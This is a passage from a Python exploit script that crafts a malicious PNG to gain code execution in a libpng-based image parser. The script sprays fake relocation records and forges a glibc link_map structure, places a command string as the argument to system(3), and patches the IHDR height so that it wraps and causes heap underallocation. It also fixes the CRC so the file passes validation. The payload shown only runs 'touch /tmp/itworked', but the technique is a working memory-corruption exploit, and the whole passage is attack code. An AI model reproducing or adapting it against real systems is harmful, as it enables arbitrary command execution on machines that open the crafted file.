reloc_record_spray = b''
reloc_align = b''
reloc_record_spray += reloc_align
reloc_record_spray += fake_reloc_record * int((heap_data_to_linkmap_off-len(reloc_align))/24)
reloc_record_spray += b'P' * (heap_data_to_linkmap_off-len(reloc_record_spray))


heap_rewrite += reloc_record_spray


# linkmap chunk overwrite
fake_linkmap = b''
# linkmap chunk header
fake_linkmap += struct.pack('<Q', 0x4141414141414141)
fake_linkmap += struct.pack('<Q', 0x4141414141414141) # keep PREV_INUSE
# start of linkmap data
fake_linkmap += struct.pack('<Q', libc_delta) # l->l_addr
fake_linkmap += struct.pack('<Q', 0xdeadc1dedeadc0de) * 12 # pad
fake_linkmap += struct.pack('<Q', dt_symtab_p) # l->l_info[5] DT_STRTAB
fake_linkmap += struct.pack('<Q', dt_symtab_p) # l->l_info[6] DT_SYMTAB
fake_linkmap += struct.pack('<Q', 0xdeadc2dedeadc0de) * 16 # pad
fake_linkmap += struct.pack('<Q', dt_jmprel_p) # l->l_info[23] DT_JMPREL
# pad up until png_ptr chunk
fake_linkmap += b'P' * (heap_linkmap_chunk_size-len(fake_linkmap))


heap_rewrite += fake_linkmap


# png_ptr chunk overwrite, this is where we pack our argument to system(3)
cmd = b'touch /tmp/itworked #'
png_ptr = b''
# png_ptr chunk header
png_ptr += struct.pack('<Q', 0x4141414141414141)
png_ptr += struct.pack('<Q', 0x4141414141414141) # keep PREV_INUSE
# start of png_ptr data
png_ptr += cmd
# align on 8
png_ptr += b'P' * (8 - (len(png_ptr) % 8))
# postpend with another reloc record spray just to up our chances
png_ptr += b'P' * 8 # align records here
png_ptr += fake_reloc_record * 16


heap_rewrite += png_ptr


# create a template PNG with a valid height for our row_data
row_data = heap_rewrite + b'P' * (width-(len(heap_rewrite)%width)) # align row data to row width
#row_data = 0x20000 * b'A'
im = Image.frombytes("L", (width, int(len(row_data)/width)), row_data)
im.save(trigger, "PNG")


# patch in a wrapping size to trigger overwrap and underallocation to desired data chunk size
patch(trigger, 20,
      struct.pack('>L',
                  (int((0xffffffff/width))+1) +
                  int((heap_data_chunk_size-0x10)/width))) # minus chunk header


# fix up the IHDR CRC so png_read_info doesn't freak out
f = open(trigger, 'rb')
f.seek(16)
ihdr_data = f.read(13)
f.close()
crc = zlib.crc32(ihdr_data, zlib.crc32(b'IHDR') & 0xffffffff) & 0xffffffff
patch(trigger, 29, struct.pack('>L', crc))


# for playing with the early file allocation itself
f = open(trigger, 'ab')
f_size = os.path.getsize(trigger)
f_size_wanted = 1024
f.write(b'P'* (f_size_wanted - f_size))
f.close()